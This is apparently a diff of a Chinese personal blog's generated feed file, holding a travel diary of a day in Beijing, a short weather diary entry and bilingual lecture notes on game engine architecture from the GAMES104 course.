    ​中国考古博物馆(中国历史文化展示中心)地处北京奥林匹克公园核心区,以考古出土文物和珍贵古籍文献为依托,致力于展示与传播中国优秀传统文化,讲好中华文明源远流长和中华文化辉煌灿烂的中国故事,打造北京城市中轴线上的历史文化客厅和展示中华文明的国家窗口。正在努力成为北京城市中轴线上的历史文化客厅、新时代对外讲好中国故事的国家形象馆。2023 年 9 月 15 日,中国考古博物馆正式面向社会公众开放[7]

    ​希望在毕业前能有一段空闲时间,能够逛逛北京的各大国系博物馆开开眼界,然后就再也不来北方了😵。

    10:04 奥运圣火

    火炬

    ​看着这个火炬让我想起了小时候看奥运会开幕会的场景,现在已经好久没关注各色体育赛事了。

    10:32 会议中心

    看着不是很大

    ​国家会议中心位于鸟巢和水立方之北,是一座八层楼、近 400 米的长形建筑。2008 年奥运会期间,由击剑馆、国际广播中心组成。
    ​主新闻中心(MPC)是文字记者和摄影记者进驻的工作区,共有 1000 多个记者工作席位及硬件配套设施。国际广播中心建筑面积 14 万平方米,是奥运会历史上最大的国际广播中心,来自全世界 16000 名广播记者都在此工作。
    ​奥运之后,国家会议中心经过一年多的改造投入经营,已走过七年历程,创造了无数辉煌,这座曾经的奥运场馆正以骄人的成绩,成为中国乃至亚洲快速成长的会展业第一品牌。大量具有国际影响力的会议、展览项目陆续在国家会议中心成功举办,让这个中国会议业的旗舰场馆向世界展示了其多平台、复合型、高质量的强大综合实力,创造出了良好的经济效益和社会效益[8]

    ​这个国家会议中心看着并不是很大,还没有海峡国际会展中心大呢。

    10:43 没啥意思

    军博会 军博会 军博会 军博会
    不得劲

    ​参观军博会之前,77 还蛮激动的,说能看到战斗机坦克之类的,而我觉得会不会安检很严,会不会有不让拍照等严苛规则。

    ​结果参观了一阵感觉没啥意思啊,就是一些公司展示它们的研发产品,看着也不是很吸引人。

    控制室解决方案

    ​我觉得这个控制室解决方案仅仅是用 Unity 之类的软件写了个前端,那我也会,没啥内涵🥴。

    ​还能看到语音助手,AI 绘画之类的东西,我觉得也都是套壳,没啥所谓真正的技术。

    ​最后简单逛一逛就出来了。

    11:29 共享单车

    租房广告

    ​77 提议去吃个老北京铜锅涮肉,于是决定骑共享单车过去。不愧是北京啊连共享单车骑起来都比保定的舒服。

    ​车架前面还有个租房小传单。¥1200 / 月的《精装单间》估计是一套大房子被拆成好多间分开租,多个租户公用一个卫生间。一张床一个厕所的《主卧独卫》就要¥3400 / 月,绝😅。

    11:53 铜锅涮肉

    清真!

    ​看导航各种迷路,最后骑到了一个社区里才找到了店家。3 个人点了个 3-4 人餐,¥295。小贵但也还能接受。最后没有吃完剩了点蔬菜。

    12:00 这是糖蒜

    糖蒜

    ​我从未见过此种食物。77 说这在北方蛮常见的可以尝尝。吃起来酸酸甜甜的,但我想到这个是蒜就没怎么想吃🤧。

    12:57 朝阳社区

    有点像河南新村

    ​吃完饭,77 提议走去护国寺小吃整点老北京某臭名昭著饮料,出发!

    ​感觉进了北京的老社区,这里面住的应该都是老北京了,住宅上的牌子都有点年代感了🥴。

    12:59 北京老房

    北京老房子

    ​凡哥说这房子看上去还不如他家呢,但估计我们倾家荡产也买不起这里的房。

    13:05 奇特建筑

    奇特建筑 奇特建筑 奇特建筑
    老北京麦当劳

    ​北京居然还有唐人街……以及北京著名小吃——老北京麦当劳🤩!

    13:10 美味豆汁

    护国寺小吃

    ​到了 77 最想去的护国寺小吃店了。77 要在这里买瓶豆汁。一开始他还想买多点宿舍一人一瓶,被我拦住了🤪。

    喜提特产

    ​最后还是 77 买了两瓶带回去给舍友尝尝鲜。2 瓶豆汁¥16,看原料只有水和绿豆,无任何添加剂,非常绿色健康啊!

    13:12 民族博院

    北京中华民族博物院 北京中华民族博物院 北京中华民族博物院
    北京中华民族博物院

    ​来到了中华民族博物院门口,进一次要¥60。看上去还蛮有特色的,但我觉得还是要带从未去过北京的凡哥逛逛景山公园比较好,遂决定下次一定,在这直接打车去景山公园。

    小小榕王,可笑可笑

    ​北京这个地方居然还能种榕树,这么小一棵榕树也被称之为榕王😅!

    13:15 图腾柱子

    感觉有点东南亚风格

    ​在柱子下等车中,不愧是北京连打车都很贵,¥29.48。

    13:46 车上抓拍

    鼓楼 什刹海 南锣鼓巷 北大红楼
    就要到了!

    ​在车上抓拍一下鼓楼、什刹海、南锣鼓巷和北大红楼。

    ​越靠近景山,越堵车。最后到景山前街路口前,司机说里面太堵了不想开了把我们轰下来了😅。

    14:17 大神武门

    景山脚下

    ​成功到达故宫博物院北口。由于故宫门票太难约了,只好跟凡哥说下次一定。上个景山凑合一下,¥2。

    14:17 景山公园

    开爬!

    ​山顶上有好看的哦!

    14:25 我要上山

    富览亭

    ​富览亭。西侧第一座亭。孔雀蓝琉璃筒瓦顶,紫晶色琉璃瓦剪边,重檐圆攒尖顶。

    辑芳亭

    ​辑芳亭。西侧第二座亭。翡翠绿琉璃筒瓦顶,黄琉璃筒瓦剪边,重檐八角攒尖式。上檐重昂七踩斗拱,下檐单昂五踩斗拱,内原供五方佛之一的阿弥陀佛,为铸铜镏金佛像,被八国联军劫去。

    ​我决定按照四年前的浏览线路再走一遍。

    14:27 北面望远

    北海公园 什刹海
    北海的菊花没有开

    ​到半山腰了。看一看北海公园和什刹海。前面的不知道是什么楼看上去没有人,不给开放。

    14:30 我登顶了

    万春亭

    ​万春亭。位于景山的中峰,中峰的相对高度为 45.7 米,是北京城南北中轴线上最高和最佳的观景点[9]

    ​这个亭子居然不让进了,“北京城南北中轴线上最高和最佳的观景点”无了。

    北面人少

    南面人多

    是谁 用时光 筑造了你的梦幻

    是谁 用尘埃 模糊了你的容颜

    望一回宫阙亭台

    尽收眼底那如画的江山

    听一番晨钟暮鼓

    用心慨叹那朝代的轮转

    王侯已成背影

    有谁还在看着云起云落的变迁[10]

    国贸 CBD

    ​被可爱小雾霾淹没的中国尊与大裤衩。

    王府井

    ​还是能记得出那个钟楼是王府井。

    14:42 我要下山

    观妙亭

    ​观妙亭。东侧第二座亭。翡翠绿琉璃筒瓦顶,黄琉璃筒瓦剪边,重檐八角攒尖式。观妙亭内原供奉五方佛之一的阿閦佛,为铸铜镏金佛像,清光绪二十六年(1900 年)被八国联军劫去。

    周赏亭

    ​周赏亭。东侧第一座亭。孔雀蓝琉璃筒瓦顶,紫晶色琉璃瓦剪边,重檐圆攒尖顶。

    14:56 歪脖子树

    崇祯 GG place

    ​景山公园另一人文景观是崇祯自缢处。景山东麓,原有一株向东倾斜的低矮老槐树,这是明崇祯朱由检自缢的地方。明末,李自成起义军于 1644 年 3 月攻入北京,崇祯 3 月 19 日逃到景山,自觉有愧于祖先基业,以腰带自尽于观妙亭下的歪脖槐树之上。十年动乱期间,老槐树被当作“四旧”砍掉,1981 年在原址新移栽了一棵古槐。1996 年,公园管理处将东城区建国门内北顺城街 7 号门前一株有一百五十多年树龄的古槐移植至老槐树原处,替代了 1981 年新移植的小槐树。

    ​接下来是我最推荐的景点——崇祯皇帝上吊处!可惜这里的树和石碑都是后来重建的。解放后北京仍有不少有历史气息的东西被毁,令人惋惜😵。

    15:16 北京市花

    月季

    ​山脚下的月季。

    15:32 我要出去

    紫禁城角楼

    ​接下来计划去天安门。这一片地方交通不太好,没得地铁和共享单车,公交车只有观光车可以坐,¥50。我们嫌贵,我们拒绝。

    ​记得四年前也是这样的情况,当时为了找地铁站强行过北海公园。而 77 去过北海公园了,那就算了,遂决定从东边绕开故宫去天安门🥳。

    15:43 池子大街

    北池子大街 南池子大街
    池子大街

    ​故宫进不去,只得东边绕开故宫,还走了好久,皇帝的房子还是大。

    ​我觉得住在这里的居民并不一定舒服,一天到到晚周围都是闹哄哄的😖,这边离地铁站也不近。

    ​还有平价商店好评!一瓶农夫山泉¥2。

    ​期间凡哥去找了个共享单车找同学去了,剩下我跟 77。

    16:04 长安大街

    长安大道连狭斜

    ​进入东长安街,还得刷身份证,搞得紧张兮兮庄严肃穆。

    中国国家博物馆

    ​希望有一天能够约上。

    没预约!寄!

    ​印象中四年前是不需要预约就能进天安门广场的(或许也要,印象不深了),就没考虑过预约问题,于是就进不去了。

    ​离回去还早,跟 77 商量了下,好像周围的地方我俩都玩过了。最后我看了看小红书,决定坐地铁去一下东交民巷,1 号线天安门东——东单,¥3。

    ​地铁太挤了地铁太挤了地铁太挤了地铁太挤了地铁太挤了地铁太挤了😠!

    16:35 同仁医院

    著名医院

    ​印象中是个很牛逼的医院。

    16:43 东交民巷

    ​东交民巷,位于北京市东城区,建造于中国 13 世纪的元朝鼎盛时期。胡同全长 1.6 千米,从天安门广场的东路一直延伸到崇文门内大街,是老北京胡同中最长的一条。早在元大都时期,这里就是运送粮食的重要小巷,因此称之为“江米巷”。
    ​东交民巷是一个集使馆、教堂、银行、俱乐部为一体的欧式风格街区。现存建筑有法国使馆,奥匈使馆。比利时使馆、日本公使馆和使馆、意大利使馆、英国使馆等。现存建筑均保留原状,保持 20 世纪初欧美流行的折中主义风格,用清水砖砌出线脚和壁柱,采用砖拱券加外廊,木结构角檩架,铁皮坡顶。东交民巷使馆建筑群是北京仅存的 20 世纪初的西洋风格建筑群[11]

    ​这条巷子曾是签订辛丑条约的地方……使馆区离故宫这么近,大清是怎么敢一次宣战这么多国的。

    16:43 哥特教堂

    圣弥额尔天主堂 圣弥额尔天主堂 圣弥额尔天主堂
    圣弥额尔天主堂

    ​圣米厄尔教堂,又称东交民巷天主堂,位于北京市东城区东交民巷甲 13 号,是北京城区最小的天主教堂,为法国高嘉理神父创建,始建于清光绪二十七年(1901 年)。
    ​圣米厄尔教堂为哥特式风格,占地面积 2656.4 平方米,清水砖墙,内部为木结构,立面为三个尖顶钟楼,用尖券、壁柱、玫瑰窗和壁龛装饰,主体建筑为高二层,坐北朝南,东西面阔三开间,南北进深十四开间。圣米厄尔教堂正门上方为教堂主保天使圣米厄尔(大天使米迦勒)的雕像。圣米厄尔教堂造型上别具特色,是西方传教士在北京修建的最后一座天主教堂,对研究清代的天主教建筑有重要研究价值[12]

    ​基本上,都不对外开放,简单拍照打卡下。

    ​在这里找到了共享单车!好耶😍!

    16:52 使馆旧址

    比利时使馆旧址 比利时使馆旧址
    比利时使馆旧址

    ​比利时使馆旧址,位于北京市东城区崇文门西大街 9 号,始建于清光绪年间,现为紫金宾馆。

    ​比利时使馆旧址现存五栋建筑,主楼为英国都铎式风格,地上三层,地下一层,立面用砖作出三个城堡和雉碟组成的山花。四栋配楼对称布置,为乡村别墅式。比利时使馆旧址是帝国主义推行对华侵略的大本营之一,是带有屈辱印记的半封建半殖民地时期的建筑,它时刻提醒着人们要牢记历史的教训,同时也为历史研究提供了重要的实物资料[13]

    ​比利时使馆旧址。

    法国使馆旧址

    ​法国使馆旧址,位于北京市东城区东交民巷 15 号,原为纯公府,清咸丰十一年(1861 年)改建为法国使馆。

    ​法国使馆旧址现存中央喷水池、大门和 4 栋配楼,大门用砖做出壁柱和拱券。4 栋配楼对称排列,为法国乡村别墅式,木构两层,有木外廊,也有砖做连续券廊。法国使馆旧址是在纯公府的中式建筑基础上修茸而成的,在很大程度上保持了中式形制和体量,为研究清晚期的使馆与王府的结合建筑提供了实物参考[14]

    ​法国使馆旧址,被围墙包得严严实实。大门是军区,不敢拍。

    16:53 邮局旧址

    法国邮政局旧址

    ​法国邮政局旧址,位于北京市东城区东交民巷 19 号,清光绪二十七年(1901 年)改建为法国邮政局。
    ​法国邮政局旧址建筑主体为砖木结构,坐北朝南,四方造型,总体为单层建筑,高约 6 米,东西侧面宽约 13 米。法国邮政局旧址作为列强在京城修建最早的一批近代领事馆区建筑,在中式建筑框架下融入了诸多西方建筑特点的折中主义风格,对研究领事馆区的建筑特点提供了实物参考[15]

    ​法国邮政局旧址。

    16:55 正金银行

    中国法院博物馆

    ​正金银行旧址,位于北京市东城区正义路 4 号,始建于清宣统二年(1910 年),原为日本横滨正金银行北京支行,现为中国法院博物馆。

    ​正金银行旧址主体建筑地上两层,地下一层,西洋古典风格,砖石立面。内为木结构,用花岗石做台基、壁柱、隅石、窗套和壁龛,转角中心设三层铁皮穹顶楼,作工套和壁龛,转角中心设三层铁皮穹顶楼。正金银行旧址是日本帝国主义对中国进行经济侵略的重要实证,有较高的历史价值[16]

    ​中国法院博物馆,亦是日本正金银行旧址。

    ​再前面有保安堵路说交通管制不让骑……

    17:08 西长安街

    ​77 提议骑共享单车去西单解决一下晚饭问题。有了共享单车就可以骑过西长安街经过天安门了!于是开冲🥳!

    我爱北京天安门,天安门上太阳升!

    ​天安门周围全是安保,盯着我们不让停车下来拍照,只好慢慢骑过去抓拍。

    伟大领袖毛主席,指引我们向前进!

    ​抓拍人民大会堂和人民英雄纪念碑。

    ​然后又骑到了新华门,不敢拍🫢。其实是允许拍摄的。

    17:12 国家剧院

    中国国家大剧院

    ​中国国家大剧院,是新“北京十六景”之一的地标性建筑,位于北京市中心天安门广场西,人民大会堂西侧,由主体建筑及南北两侧的水下长廊、地下停车场、人工湖、绿地组成。
    ​中国国家大剧院由法国建筑师保罗·安德鲁主持设计,国家大剧院外观呈半椭球形,东西方向长轴长度为 212.20 米,南北方向短轴长度为 143.64 米,建筑物高度为 46.285 米,占地 11.89 万平方米,总建筑面积约 16.5 万平方米,其中主体建筑 10.5 万平方米,地下附属设施 6 万平方米,总造价 30.67 亿元。设有歌剧院、音乐厅、戏剧场以及艺术展厅、餐厅、音像商店等配套设施[17]

    ​国家大剧院。看上去就一蛋🤨……

    17:30 沙县小吃

    沙县国际大酒楼

    ​终于骑到了西单。看一看西单里的沙县国际大酒楼,价格感人😅……

    17:54 南昌罐汤

    鸡蛋肉饼汤

    ​在西单大悦城解决晚饭问题。由于我中午吃得太好导致晚上都不怎么想吃东西,于是就要了一碗瓦罐汤,¥10。77 要了一碗赣面¥19,他说这玩意太辣了😶‍🌫️,我这个福建人是怎么推荐这玩意的。

    18:43 安河桥北

    让我再看你一眼 从南到北

    ​北京之行就要结束了!乘地铁 4 号线西单——北京西站,¥3。

    ​地铁出来进北京西站免安检,还挺令我意外,印象中铁路的安检级别是比地铁要高的🤔。

    20:29 人真是多

    候车室

    ​啊,河北保定,我又要回来了😭!

    ​最后还是有惊无险地赶在 22:30 前到宿舍,洗上了澡。

    ​然后就是品尝豆汁时间!一股酸酸臭臭的口感,得到了宿舍的一致差评!什么玩意!真不是给人喝的😅!

    参考文献


    1. Python 把图片转换为 webp (xpdbk.com) ↩︎

    2. 北京奥林匹克塔_百度百科 (baidu.com) ↩︎

    3. 北京奥运会玲珑塔_百度百科 (baidu.com) ↩︎

    4. 国家体育场_百度百科 (baidu.com) ↩︎

    5. 国家体育馆(北京大型体育运动场馆)_百度百科 (baidu.com) ↩︎

    6. 国家游泳中心_百度百科 (baidu.com) ↩︎

    7. 中国考古博物馆_百度百科 (baidu.com) ↩︎

    8. 国家会议中心_百度百科 (baidu.com) ↩︎

    9. 景山公园(中国 4A 级旅游景区)_百度百科 (baidu.com) ↩︎

    10. 大故宫(阎崇年系列节目《大故宫》同名主题曲)_百度百科 (baidu.com) ↩︎

    11. 东交民巷(北京市文物保护街区)_百度百科 (baidu.com) ↩︎

    12. 圣米厄尔教堂_百度百科 (baidu.com) ↩︎

    13. 比利时使馆旧址_百度百科 (baidu.com) ↩︎

    14. 法国使馆旧址_百度百科 (baidu.com) ↩︎

    15. 法国邮政局旧址_百度百科 (baidu.com) ↩︎

    16. 正金银行旧址(北京市第五批全国重点文物保护单位)_百度百科 (baidu.com) ↩︎

    17. 中国国家大剧院_百度百科 (baidu.com) ↩︎

    ]]>
    @@ -2006,7 +2006,7 @@ /posts/Diary-16-%E7%83%AD%E7%83%AD%E7%83%AD%EF%BC%81/ - 前言

    热热热!

    ​我觉着这段时间,保定是比福州要热的,从网上爬个数据比较下。

    气温

    ​感觉华北热的早,最高温更高,但是昼夜温差更大些。

    正文

    5.6

    月季 月季 月季
    粉月季与红月季

    ​ 食堂门口的月季开花了!

    5.9

    Electronics yyds!

    ​毕业季校招开始了,居然能看到 MDPI 的校招……工资看上去还不错,看样子这个公司收了不少版面费😅。

    5.11

    未来石

    ​从东湖公园望向未来石,蓝白绿的三色调,是夏天的气息。

    关汉卿大剧院

    ​雾霾也开始逐渐减少了!

    嘎嘎嘎

    嘎嘎嘎 嘎嘎嘎 嘎嘎嘎

    ​东湖里又有了游弋的大白鹅,数一数,一二三四五六七,跟当年协和里一个数。

    ​不知道这群鹅冬天是怎么过来的。

    B

    ​“I❤BD”的招牌只剩下了个 B😅……

    5.12

    中央空调已试运行,哪个实验室空调不好使可以报一下。

    ​实验室终于开启了空调……但我觉得开的太小了还是不够舒服,晚上更是直接断电了。

    5.16

    白月季

    ​白色的月季也盛开了!

    5.19

    ]]>
    + 前言

    热热热!

    ​我觉着这段时间,保定是比福州要热的,从网上爬个数据比较下。

    气温

    ​感觉华北热的早,最高温更高,但是昼夜温差更大些。

    正文

    5.6

    月季 月季 月季
    粉月季与红月季

    ​ 食堂门口的月季开花了!

    5.9

    Electronics yyds!

    ​毕业季校招开始了,居然能看到 MDPI 的校招……工资看上去还不错,看样子这个公司收了不少版面费😅。

    5.11

    未来石

    ​从东湖公园望向未来石,蓝白绿的三色调,是夏天的气息。

    关汉卿大剧院

    ​雾霾也开始逐渐减少了!

    嘎嘎嘎

    嘎嘎嘎 嘎嘎嘎 嘎嘎嘎

    ​东湖里又有了游弋的大白鹅,数一数,一二三四五六七,跟当年协和里一个数。

    ​不知道这群鹅冬天是怎么过来的。

    B

    ​“I❤BD”的招牌只剩下了个 B😅……

    5.12

    中央空调已试运行,哪个实验室空调不好使可以报一下。

    ​实验室终于开启了空调……但我觉得开的太小了还是不够舒服,晚上更是直接断电了。

    5.16

    白月季

    ​白色的月季也盛开了!

    5.19

    ]]>
    @@ -2060,7 +2060,7 @@ /posts/GAMES104-Basic%20Elements/ - 资源

    课程

    第一节:游戏引擎导论

    OVERVIEW OF GAME ENGINE

    Game: Miracle of Modern computer Technology

    ​游戏:现代计算机技术的奇迹

    Game Engine: The Diamond on the crown

    ​游戏引擎:皇冠上的钻石

    ​游戏引擎中所涉及的技术太多了。

    Topic 1: WHY WE NEED TO LEARN

    Game Engine is the Foundation of Virtual World

    ​游戏引擎是虚拟世界的基础

    游戏引擎除了做游戏,还可以干这些事情:

    • METAHUMAN

      拟人

    • CINEMATIC & ANIMATION

      电影与动画

    • SIMULATION

      模拟(军事)

    • DIGITAL TWIN

      数字孪生

    Topic 2: HISTORY OF GAME ENGINE

    Early Age of Video Games

    png

    ​早期游戏:红白机,超级马里奥,坦克大战,魂斗罗。

    Father of Game Engine

    png

    • John carmack

    John conceived and executed a new way oforganizing the components of computer games by separating execution of core functionality by thegame engine from the creative assets that filled the play space and content of a specific game title.

    ​约翰构思并实施了一种组织计算机游戏组件的新方法,将游戏引擎执行的核心功能与填充特定游戏标题的游戏空间和内容的创意资产分开。

    ​这个人被称之为游戏引擎之父,让不同游戏间代码可以互用。

    • Wolfenstein 3D (1992)

    “Father of 3D shooters” and first demonstration of game engine application

    ​“3D 射击之父”暨游戏引擎应用首次演示

    • Doom

    png

    Along with its predecessor Wolfenstein 3D, Doom defined the FPS genre and inspired numerous similar games, often called the Doom clones. lt was the first online distribution game, and it pioneered technologies including 3D graphics, networked multiplayer gaming, and support for custom modifications via packaged WAD files.

    ​与其前身《德军总部 3D》一起,《毁灭战士》定义了 FPS 类型,并启发了许多类似的游戏,通常被称为《毁灭战士》克隆游戏。它是第一款在线发行游戏,它开创了包括 3D 图形、网络多人游戏以及通过打包的 WAD 文件进行自定义修改的支持等技术。

    • Engine License

    1994, ID Software license Doom engine to Raven, which built a successful game ShadowCaster based on it.

    ​1994 年,ID Software 将 Doom 引擎授权给 Raven,Raven 基于它打造了一款成功的游戏 ShadowCaster。

    Early Age of Modern Game Engine

    png

    • Quake

    • Unlike the Doom Engine, the Quake engine offered full real-time 3D rendering and supported early 3D acceleration through OpenGL.

      与 Doom 引擎不同,Quake 引擎提供完整的实时 3D 渲染,并通过 OpenGL 支持早期 3D 加速。

    png

    A game engine is a software framework primarily designed for the development of video games, which normally includes relevant libraries and support programs

    ​游戏引擎是主要为视频游戏开发而设计的软件框架,通常包括相关的库和支持程序。

    Family of Game Engines

    png

    游戏引擎有三大类:

    • Commercial Engine

      商用引擎

    • In-house Engine

      内部引擎(寒霜等,不公开)

    • Free Engine

      免费引擎

    Middleware of Game Engine

    png

    ​游戏引擎中可能用到的框架,用于解决某些特定问题。

    Topic 3: WHAT ISGAME ENGINE

    What’s Game Engine?

    ​A game engine is a software framework primarily designed for the development of video games, and generally includes relevant libraries and support programs. The “engine” terminology is similar to the term “software engine” used in the software industry.
    ​Game engine can also refer to the development software utilizing this framework, typically offering a suite of tools and features for developing games.
    ​Developers can use game engines to construct games for video game consoles and other types of computers. The core functionality typically provided by a game engine may include a rendering engine ( “renderer” ) for 2D or 3D graphics,a physics engine or collision detection (and collision response), sound,scripting, animation, artificial intelligence, networking, streaming, memory management, threading, localization support,scene graph, and video support for cinematics. Game engine implementers often economize on the process of game development by reusing/adapting, in large part,the same game engine to produce different games or to aid in porting games to multiple platforms.

    ​游戏引擎是主要为视频游戏开发而设计的软件框架,一般包括相关的库和支持程序。“引擎”术语类似于软件行业中使用的术语“软件引擎”。
    ​游戏引擎也可以指利用该框架的开发软件,通常提供一套用于开发游戏的工具和功能。
    ​开发人员可以使用游戏引擎为视频游戏机和其他类型的计算机构建游戏。游戏引擎通常提供的核心功能可能包括用于 2D 或 3D 图形的渲染引擎(“渲染器”)、物理引擎或碰撞检测(和碰撞响应)、声音、脚本、动画、人工智能、网络、流媒体、内存管理、线程、本地化支持、场景图和电影视频支持。游戏引擎实现者通常通过在很大程度上重用/改编相同的游戏引擎来制作不同的游戏或帮助将游戏移植到多个平台,从而节省游戏开发的过程。

    ​Wiki 里对游戏引擎的解释十分复杂。

    Our Definition: What’s Game Engine?

    • Technology foundation of the Matrix

      黑客帝国的技术基础

    • Productivity tools of creation

      创造的生产力工具

    • The Art of complexity

      复杂性的艺术

    Infinite Details of the World

    ​天地有大美而不言

    Complexity of Simulation by 0/1

    png

    ​用计算机的 0 和 1 表示这些东西,太难了

    Game Engine is Far Beyond Rendering

    png

    ​渲染只是游戏引擎中的一小部分。

    God with Limited Power in Realtime

    ​上帝所创造的真实世界拥有无尽的算力。计算机所创造的世界受算力影响,需要在 1/帧率 时间内完成计算,因此优化是一个大问题。

    Toolchain for Creators

    png

    ​给创造者的工具——游戏引擎。

    Developer Platform

    • For Programmer

      对于程序员

      • Expandable APl interfaces allow programmers to define various of gameplay without changing the core.

        可扩展的 APl 接口允许程序员在不改变核心的情况下定义各种游戏玩法。

    • For Studio

      对于工作室

      • Collaborate hundreds of developers with different work streams smoothly together.

        数百名具有不同工作流程的开发人员顺利协作。

    Update the Engine in the Air

    ​游戏引擎更新的过程中要保证兼容性,相当于在飞行过程中更换飞机零件。

    Yes, We Are…

    ​是的,我们是…

    The Creator and Operator of This Ugly Monster.

    ​这个丑陋怪物的创造者和操纵者。

    But Future Will be Even More Difficult.

    ​但未来会更加困难。

    Topic 4: HOW TO STUDY

    Game Engine Technology Covers All Major Area of Computer Science

    ​游戏引擎技术涵盖计算机科学的所有主要领域。

    png

    ​多读书多看报。

    Focus on the Main Road by Building the Framework

    ​游戏引擎领域范围太广了,课程只按主路进行。

    Topic 5: COURSE CONTENT

    Basic Elements

    png

    • Engine structure and layers

      引擎结构和层数

    • Data organization and management

      数据组织和管理

    png

    Rendering

    png

    • Model, material, shader, texture
    • Light and shadow
    • Render pipeline
    • Sky, terrain, etc

    Animation

    png

    • Basic concepts of animation

      动画的基本概念

    • Animation structure and pipeline

      动画结构和流程

    Physics

    png

    • Basic concepts of Physics System

      物理系统的基本概念

    • Gameplay applications

      游戏应用程序

    • Performance optimization

      性能优化

    Gameplay

    png

    • Event System

      事件系统

    • Scripts System

      脚本系统

    • Graph Driven

      图驱动(蓝图)

    Misc. Systems

    ​杂项系统

    png

    • Effects

    • Navigation

    • Camera

    Toolchain

    ​工具链

    png

    • C++ Reflection
      Expose variables and functions used in the editor. That is, the game creation tool will use a form of reflection (or similar) on the code provided by the developers, which then allows it to expose parts of it in editors for designers.

      公开编辑器中使用的变量和函数。也就是说,游戏创建工具将对开发人员提供的代码使用某种形式的反射(或类似形式),然后允许它在编辑器中向设计人员公开部分代码

    • Data Schema
      A data schema is the formal description of the structures which a system is working with.

      数据模式是系统正在使用的结构的正式描述。

    Online Gaming

    png

    • Lockstep synchronization

      锁步同步

    • State synchronization

      状态同步

    • Consistency

      一致性

    Advanced Technology

    png

    • Motion Matching

      动作匹配

      Motion Matching is a simple yet powerful way of animating characters in games. Compared to other methods, it doesn’t require very much manual work once you have a basic set-up. there is no need to structure clips in graphs, to carefully cut or synchronize them, or to explicitly create new transitions between status.

      动作匹配是一种简单而强大的游戏角色动画方式。与其他方法相比,一旦完成基本设置,它就不需要太多手动工作。无需在图表中构造剪辑、仔细剪切或同步它们,或显式地在状态之间创建新的转换。

    • Procedural Content Generation (PCG)

      程序内容生成(PCG)

      PCG is a method of creating data algorithmically as opposed to manually, typically through a combination of human-generated assets and algorithms coupled with computer-generated randomness and processing power.

      PCG 是一种通过算法而不是手动创建数据的方法,通常通过将人类生成的资产和算法与计算机生成的随机性和处理能力相结合。

    png

    • Data-Oriented Programming (DOP)

      面向数据的编程(DOP)

      DOP is an exciting new paradigm that eliminates the usual complexity caused by combining data and code into objects and classes. In DOP, you maintain application data in persistent generic data structures separated from the program’s code. You use general-purpose functions to manipulate the data without mutating it. This approach rids your applications of state-related bugs and makes your code much easier to understand and maintain.

      DOP 是一个令人兴奋的新范例,它消除了将数据和代码组合到对象和类中通常带来的复杂性。在 DOP 中,您可以在与程序代码分离的持久通用数据结构中维护应用程序数据。您可以使用通用函数来操作数据而不改变数据。这种方法可以消除应用程序中与状态相关的错误,并使您的代码更易于理解和维护。

    • Job System
      A job system manages multithreaded code by creating jobs instead of threads.

      作业系统通过创建作业而不是线程来管理多线程代码。

    png

    • Lumen
      Unreal Engine 5’ s new fully dynamic global illumination and reflections system that is designed for next-generation consoles. lt renders diffuse interreflection with infinite bounces and indirect specular reflections in large, detailed environments at scales ranging from millimeters to kilometers.

      虚幻引擎 5 专为下一代游戏机设计的全新全动态全局照明和反射系统。它可以在大型、详细的环境中以毫米到公里的尺度呈现具有无限反射和间接镜面反射的漫反射。

    • Nanite
      Unreal Engine 5’ s new virtualized geometry system which uses a new internal mesh format and rendering technology to render pixel scale detail and high object counts.

      虚幻引擎 5 的新虚拟几何系统使用新的内部网格格式和渲染技术来渲染像素级细节和高对象数量。

    Topic 6: COURSE LOGISTICS

    png

    ​参考书籍:Jason Gregroy,“Game Engine Architecture”, 3rd or later editions

    第二节:引擎架构分层

    A Glance of Game Engine Layers

    Sea of Codes

    Where to begin?

    ​游戏引擎架构十分复杂,该从何开始研究?

    png

    ​课程认为游戏引擎可以分为五层,自上而下依次是:

    • Tool Layer

      工具层

    • Function Layer

      功能层

    • Resource Layer

      资源层

    • Core Layer

      核心层

    • Platform Layer

      平台层

    Tool Layer:给游戏开发者的平台

    Chain of Editors

    png

    Function Layer:实现游戏的各种基础功能

    Make lt Visible, Movable and Playable

    ​使游戏内容可见、可移动和可播放

    png

    • Animation

      动画

    • Physics

      物理

    • Rendering

      渲染

    • Camera, HUD and Input

      相机,HUD 和输入

    ​HUD 是 Heads-Up Display 的缩写,指的是游戏界面上用来显示各种信息的部分,通常位于屏幕的边缘或角落。HUD 可以包括玩家的健康值、能量条、地图、任务目标、物品栏等信息,以帮助玩家更好地了解游戏情况并进行操作。HUD 的设计可以根据游戏类型和风格而有所不同,有些游戏甚至允许玩家自定义 HUD 以满足其个人喜好。

    • Script, FSM and Al

      脚本,有限状态机和人工智能

    Resource Layer:管理游戏各种 assets。

    Data and Files

    png

    ​有多种文件格式需要游戏引擎去读取。

    Core Layer:类似操作系统,需要管理线程、内存等资源分配。

    Swiss Knife of Game Engine

    ​游戏引擎的瑞士刀

    png

    Platform Layer:让游戏编写者写出的游戏能够在不同平台中运行。

    Launch on Different Platforms

    ​在不同平台上启动

    png

    3rd Parity Libraries:第三方库

    Middleware and 3rd Party Libraries

    png

    ​市面上已有多种轮子以实现某些功能。

    Explore Game Engine Layers

    Practice is the Best Way to Learn

    ​实践是学习的最好办法!我们从一个案例开始。

    png

    Simple Animated Character Challenge

    ​简单的动画角色挑战。我想设计一个动画系统,要求如下:

    • Create, animate and render a character

      创建、动画和渲染角色

    • Playable on selected hardware platforms

      可在选定的硬件平台上播放

    Resource-How to Access My Data

    资源 - 如何访问我的数据

    png

    • Offline Resource lmporting

      线下资源导入

    • Unify file access by defining a meta asset file format (ie.ast)

      通过定义元资产文件格式(即 .ast)来统一文件访问(对于 PSD、MAX、MAYA 这种类型的文件,可能包含了大量对游戏引擎来说的无用信息,应该去除。)

    • Assets are faster to access by importing preprocess

      通过导入预处理可以更快地访问资产

    • Build a composite asset file to refer to all resources

      构建复合资产文件以引用所有资源

    • GUlD is an extra protection of reference

      GUID 是对参考的额外保护

    Resource-Runtime Asset Manager

    ​资源运行时资产管理器

    png

    Runtime Resource Management

    ​运行时资源管理(游戏运行时需要加载/移除哪些资源)

    • A virtual file system to load/unload assets by path reference

      通过路径引用加载/卸载资源的虚拟文件系统

    • Manage asset lifespan and reference by handle system

      通过手柄系统管理资产寿命和参考

    Resource-Manage Asset Life Cycle

    ​资源管理资产生命周期

    png

    Memory management for Resources - life cycle

    ​资源的内存管理 - 生命周期

    • Different resources have different life cycles

      不同的资源有不同的生命周期

    • Limited memory requires release of loaded resources when possible

      有限的内存需要尽可能释放已加载的资源

    • Garbage collection and deferred loading is critical features

      垃圾收集和延迟加载是关键功能

    Function-How to Make the World Alive

    png

    ​功能层有这么多东西需要去实现。

